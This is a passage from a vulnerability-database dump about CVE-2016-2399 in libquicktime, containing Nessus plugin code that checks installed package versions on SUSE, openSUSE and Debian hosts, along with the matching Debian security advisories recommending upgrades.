audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:50:10", "description": "Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow attack.\nWhen opened, a specially crafted MP4 file would cause a denial of\nservice by crashing the application.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Debian DSA-3800-1 : libquicktime - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-03T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libquicktime"], "id": "DEBIAN_DSA-3800.NASL", "href": "https://www.tenable.com/plugins/nessus/97498", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3800. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97498);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2399\");\n script_xref(name:\"DSA\", value:\"3800\");\n\n script_name(english:\"Debian DSA-3800-1 : libquicktime - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow attack.\nWhen opened, a specially crafted MP4 file would cause a denial of\nservice by crashing the application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libquicktime\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3800\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libquicktime packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime-dev\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime-doc\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libquicktime2\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"quicktime-utils\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"quicktime-x11utils\", reference:\"2:1.2.4-7+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:32:15", "description": "This update for libquicktime fixes the following issues :\n\n - CVE-2016-2399: A Integer overflow in the\n quicktime_read_pascal function in libquicktime allowed\n remote attackers to cause a denial of service or\n possibly have other unspecified impact via a crafted\n hdlr MP4 atom [boo#1022805]", "edition": 18, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-02-24T00:00:00", "title": "openSUSE Security Update : libquicktime (openSUSE-2017-288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-02-24T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libquicktime-tools", "p-cpe:/a:novell:opensuse:libquicktime0-debuginfo-32bit", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libquicktime0-32bit", "p-cpe:/a:novell:opensuse:libquicktime0", "p-cpe:/a:novell:opensuse:libquicktime0-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:libquicktime-debugsource", "p-cpe:/a:novell:opensuse:libquicktime-devel", "p-cpe:/a:novell:opensuse:libquicktime-tools-debuginfo"], "id": "OPENSUSE-2017-288.NASL", "href": "https://www.tenable.com/plugins/nessus/97368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97368);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"openSUSE Security Update : libquicktime (openSUSE-2017-288)\");\n script_summary(english:\"Check for the openSUSE-2017-288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues :\n\n - CVE-2016-2399: A Integer overflow in the\n quicktime_read_pascal function in libquicktime allowed\n remote attackers to cause a denial of service or\n possibly have other unspecified impact via a crafted\n hdlr MP4 atom [boo#1022805]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libquicktime packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libquicktime0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-debugsource-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-devel-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-tools-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime-tools-debuginfo-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime0-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libquicktime0-debuginfo-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libquicktime0-32bit-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-32bit-1.2.4cvs20150223-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-debugsource-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-devel-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-tools-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime-tools-debuginfo-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime0-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libquicktime0-debuginfo-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libquicktime0-32bit-1.2.4cvs20150223-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-32bit-1.2.4cvs20150223-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime-debugsource / libquicktime-devel / libquicktime-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:06:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2399"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3800-1 security@debian.org\nhttps://www.debian.org/security/ Sebastien Delafond\nMarch 02, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libquicktime\nCVE ID : CVE-2016-2399\nDebian Bug : 855099\n\nMarco Romano discovered that libquicktime, a library for reading and\nwriting QuickTime files, was vulnerable to an integer overflow\nattack. When opened, a specially crafted MP4 file would cause a denial\nof service by crashing the application.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.2.4-7+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:1.2.4-10.\n\nWe recommend that you upgrade your libquicktime packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2017-03-02T09:19:42", "published": "2017-03-02T09:19:42", "id": "DEBIAN:DSA-3800-1:6B4DD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00054.html", "title": "[SECURITY] [DSA 3800-1] libquicktime security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2399"], "description": "Package : libquicktime\nVersion : 2:1.2.4-3+deb7u1\nCVE ID : CVE-2016-2399\nDebian Bug : 855099\n\nMarco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-03-01T01:18:31", "published": "2017-03-01T01:18:31", "id": "DEBIAN:DLA-844-1:470FD", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201703/msg00000.html", "title": "[SECURITY] [DLA 844-1] libquicktime security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}